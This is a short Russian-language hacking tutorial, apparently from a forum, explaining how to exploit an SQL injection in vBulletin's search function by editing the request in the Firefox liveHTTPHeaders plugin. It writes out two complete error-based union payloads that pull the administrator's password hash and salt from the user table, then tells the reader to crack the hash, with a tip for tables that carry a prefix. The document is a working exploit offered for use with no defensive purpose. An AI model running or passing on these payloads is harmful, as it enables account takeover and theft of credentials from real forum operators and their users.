Заходим, регистрируемся (не всегда обязательно, если поиск без всяких там капч и вопросов от имени гостя проходит, то рега не впёрлась).
Запускаем лису, плагин liveHTTPHeaders.
Вбиваем в поле поиска любую лабуду, например "4234234" и жмём enter
В liveHTTPHeaders редактируем запрос таким вот образом, дописывая это:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Посмотреть вложение 99
Отправляем запрос, выйдет ошибка Database error
Смотрим исходный код, внизу находим хэш, записываем.
Теперь оправляем запрос на вывод соли, вот такой:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Опять ошибка, опять смотрим исходный код, записываем соль.
Всё, осталось только расшифровать.
Иногда таблица не user называется, тогда хэш мы не увидим, а увидим на месте хэша какую-то лабуду, а чуть выше виден будет префикс, вот его и дописываем в наш запрос, и тогда всё бенч будет.